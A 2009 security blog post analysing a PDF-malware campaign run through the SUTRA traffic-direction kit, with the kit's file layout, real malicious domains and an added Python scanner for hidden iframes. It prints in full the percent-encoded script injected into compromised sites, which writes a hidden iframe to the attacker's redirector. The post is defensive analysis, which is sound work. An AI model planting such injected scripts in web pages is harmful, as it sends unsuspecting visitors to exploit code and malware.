Saturday, March 28, 2009

Black Hat SEO - PDF Malware campaign

The silent threat: Black Hat SEO - PDF Malware campaign


Earlier in March, Adobe released security updates addressing vulnerabilities being exploited through Adobe Reader. Some links can be found below:

McAfee Avert Labs: New Backdoor Attacks using PDF Documents
Trend Micro Malware Blog: Portable Document Format or Portable Malware Format?
SANS Internet Storm Center: Adobe/Acrobat 0-day in the wild?

Adobe Security Bulletin: Buffer overflow issue

Here is a complete example with screenshots, data and analysis of a website
used in the PDF malware campaign and hosting a malicious application called SUTRA.

The application, also known as "Traffic Management System", is explained by
McAfee Avert Labs on this page: Inside the malicious traffic

This cybercrime toolkit is actively used to manage traffic from compromised
websites and to redirect visitors to exploit code or other malicious URLs serving
fake codecs, rogue antispyware applications, keyloggers, banker trojans and many more.

We have another example of a compromised website explained here.
A screenshot of SUTRA can also be found.

***

Now let's take a look at another website used in the campaign.

The site is "salevisitor.net" 89.107.104.10
[Do not enter this site unless you know what you are doing]

The payload is located here "salevisitor.net/in.cgi?6" [Unstable - file not found at this time]

For reference, this is the file and folder structure of the SUTRA Traffic Manager:

drwxr-xr-x (755) admin
drwxrwxrwx (777) data
drwxr-xr-x (755) files
drwxr-xr-x (755) html
drwxr-xr-x (755) install
drwxrwxrwx (777) memory
drwxrwxrwx (777) stats
drwxrwxrwx (777) admin/tmp
drwxrwxrwx (777) admin/tmp.web
   
-rwxr-xr-x (755) getos.cgi
-rwxr-xr-x (755) in.cgi
-rw-r--r-- (644) index.html
   
admin:  
-rwxr-xr-x (755) c.cgi
-rwxr-xr-x (755) center.cgi
-rwxr-xr-x (755) cron
-rwxr-xr-x (755) cron.sh
-rw-r--r-- (644) index.html
-rw-r--r-- (644) panel.html
drwxrwxrwx (777) tmp
drwxrwxrwx (777) tmp.web
-rwxr-xr-x (755) ub_fetcher
   
data:  
-rw-r--r-- (644) admin_forces.html
-rw-r--r-- (644) connection_type.html
-rw-r--r-- (644) connection_type_new.html
-rw-r--r-- (644) crontab_wizard.html
-rw-r--r-- (644) edit_force_data.html
-rw-r--r-- (644) edit_force.html
-rw-r--r-- (644) edit.html
-rw-r--r-- (644) edit_user.html
-rw-r--r-- (644) force_data.html
-rw-r--r-- (644) force.html
-rw-r--r-- (644) forces.html
-rw-r--r-- (644) forces_view.html
-rw-r--r-- (644) general_stat.html
-rw-r--r-- (644) GeoIP.dat
-rw-r--r-- (644) geoip.html
-rw-r--r-- (644) global_options.html
-rw-r--r-- (644) global_vars.html
-rw-r--r-- (644) import.html
-rw-r--r-- (644) index.html
-rw-r--r-- (644) key
-rw-r--r-- (644) login.html
-rw-r--r-- (644) lstats_export.html
-rw-r--r-- (644) lstats.html
-rw-r--r-- (644) main.html
-rw-r--r-- (644) navigation.html
-rw-r--r-- (644) page.html
-rw-r--r-- (644) pages_navigation.html
-rw-r--r-- (644) profile.html
-rw-r--r-- (644) pstats_export.html
-rw-r--r-- (644) pstats.html
-rw-r--r-- (644) pstats_index.html
-rw-r--r-- (644) register_done.html
-rw-r--r-- (644) register.html
-rw-r--r-- (644) search.html
-rw-r--r-- (644) show_bottom.html
-rw-r--r-- (644) show_data.html
-rw-r--r-- (644) show_header.html
-rw-r--r-- (644) stat_daily.html
-rw-r--r-- (644) static_stat.html
-rw-r--r-- (644) stat_main.html
-rw-r--r-- (644) stats.html
-rw-r--r-- (644) uptime_main.html
-rw-r--r-- (644) users.html
   
files:  
-rw-r--r-- (644) cgi.pm
-rw-r--r-- (644) counter.gif
-rwxr-xr-x (755) curl
-rwxr-xr-x (755) default.cgi
-rwxr-xr-x (755) gotourl.cgi
   
html:  
-rw-r--r-- (644) image files and javascript (gif, js)
   
install:  
drwxr-xr-x (755) freebsd4 // in.cgi
drwxr-xr-x (755) freebsd5 // in.cgi
drwxr-xr-x (755) freebsd6 // in.cgi
drwxr-xr-x (755) linux // in.cgi
   
stats:  
-rw-r--r-- (644) index.html

The admin page has no password on this server, so anyone can enter and see stats like the following:




So now we know the IP, the domain name and the URLs used after redirection,
but where is the traffic coming from?

Let's take a look at another folder, "/memory/".

This folder contains files such as 1.access.log, 2.access.log, 5.access.log,
25.access.log, 70.access.log, etc.

Some related posts on this blog refer to onlinedetect.com and 0day33hours.com for another malware campaign. Similar files can be found using Google: here and here.

2.access.log - This file contains the IP addresses of visitors reaching infected
websites; some are in the Czech Republic, Israel, Russia, Turkey, etc.
The file also reveals the URLs of some compromised websites
where the malicious obfuscated JavaScript code has been inserted.



Line 1:

hxxp://www.met[BLOCKED]p.com.pl/meta...........
Javascript Analysis

Line 23: 77.250.xx.xx

http%3A%2F%2Fwww%2Este[BLOCKED]tos%2Enl%2Find.....
Javascript Analysis

hxxp://www.gif[BLOCKED]za.pl/gify/baj...
Javascript Analysis

The analysis confirms that all these sites have the same code added:

<script>
if (!myia){ document.write(unescape('%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%35%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%73%61%6c%65%76%69%73%69%74%6f%72%2e%6e%65%74%2f%69%6e%2e%63%67%69%3f%32&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%31%35%32%38%29%2b%27%37%30%65%33%66%35%31%63%35%27%20%77%69%64%74%68%3d%35%32%20%68%65%69%67%68%74%3d%34%31%34%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'));
}
var myia = true; </script>

The unescape() string decodes to the following hidden iframe:
<iframe name=c15 src='http://salevisitor.net/in.cgi?2&'+
Math.round(Math.random()*21528)+'70e3f51c5'
width=52 height=414 style='display: none'></iframe>
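As an added example (not code from the original post or from the SUTRA kit), here is a small Python script that automates the manual step above: it decodes the unescape() payload of the injected script, pulls the src out of any iframe it finds, and flags the frame when it is hidden with display:none or points at a host already known from this campaign. The sample page, the decoded payload and the one-entry blocklist are constructed here from the data quoted in the post; the function names are my own.

```python
import re
from urllib.parse import unquote

# Percent-encoded payload copied from the script quoted in the post, with the
# line breaks of the blog layout removed so that no %XX sequence is split.
ENCODED_IFRAME = (
    "%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63"
    "%31%35%20%73%72%63%3d%27%68%74%74%70%3a%2f"
    "%2f%73%61%6c%65%76%69%73%69%74%6f%72%2e%6e"
    "%65%74%2f%69%6e%2e%63%67%69%3f%32&%27%2b"
    "%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74"
    "%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%31%35"
    "%32%38%29%2b%27%37%30%65%33%66%35%31%63%35"
    "%27%20%77%69%64%74%68%3d%35%32%20%68%65%69"
    "%67%68%74%3d%34%31%34%20%73%74%79%6c%65%3d"
    "%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65"
    "%27%3e%3c%2f%69%66%72%61%6d%65%3e"
)

# Constructed sample of an infected page: the injected script exactly as it
# appears on the compromised sites, surrounded by a little ordinary markup.
SAMPLE_PAGE = (
    "<html><body><h1>Gallery</h1>\n"
    "<script>\nif (!myia){ document.write(unescape('" + ENCODED_IFRAME + "'));\n}\n"
    "var myia = true; </script>\n"
    "</body></html>"
)

# Redirector host seen in this campaign (taken from the post). A real
# deployment would load such indicators from a maintained blocklist.
KNOWN_BAD_HOSTS = {"salevisitor.net"}

UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.I | re.S)
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_ATTR = re.compile(r"\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
URL_HOST = re.compile(r"^https?://([^/:?#]+)", re.I)
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def decode_unescape_calls(html):
    """Return the decoded argument of every unescape('...') call in the page.

    JavaScript unescape() turns %XX into the byte XX; for the ASCII-only
    payloads seen in this campaign, urllib's unquote() gives the same result.
    """
    return [unquote(m.group(2)) for m in UNESCAPE_CALL.finditer(html)]


def analyse_iframes(markup):
    """Describe each <iframe> in a piece of markup: src, host, hidden or not."""
    findings = []
    for tag in IFRAME_TAG.findall(markup):
        src_match = SRC_ATTR.search(tag)
        src = src_match.group(1) if src_match else ""
        host_match = URL_HOST.match(src)
        findings.append({
            "src": src,
            "host": host_match.group(1).lower() if host_match else "",
            "hidden": bool(HIDDEN_STYLE.search(tag)),
        })
    return findings


def scan_page(html, known_bad_hosts=KNOWN_BAD_HOSTS):
    """Flag iframes that are hidden or that point at a known bad host.

    Both the raw page and every decoded unescape() payload are examined, so
    an iframe hidden behind one layer of percent-encoding is still found.
    """
    suspicious = []
    for chunk in [html] + decode_unescape_calls(html):
        for finding in analyse_iframes(chunk):
            finding["known_bad"] = finding["host"] in known_bad_hosts
            if finding["hidden"] or finding["known_bad"]:
                suspicious.append(finding)
    return suspicious


if __name__ == "__main__":
    for hit in scan_page(SAMPLE_PAGE):
        print(hit)
```

Run against the constructed sample page, scan_page() reports a single hidden iframe whose host is salevisitor.net, matching the hand-decoded iframe above. The random number and the trailing hash the script appends to the in.cgi URL are ignored on purpose: they change per visitor, so the stable indicators are the host, the CGI path and the display:none style.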

Analysis report for hxxp://salevisitor.net/in.cgi?2

The script loads a PDF located at quara-best.com/[BLOCKED]e30/pdf.php?id=5352,
which then loads this executable --> VirusTotal Report

******************

Some other related links:

Honeynet Malware Detail
Analysis of hxxp://eternal.alfamoon.com here

MySpace Profile Attacked (screenshot below)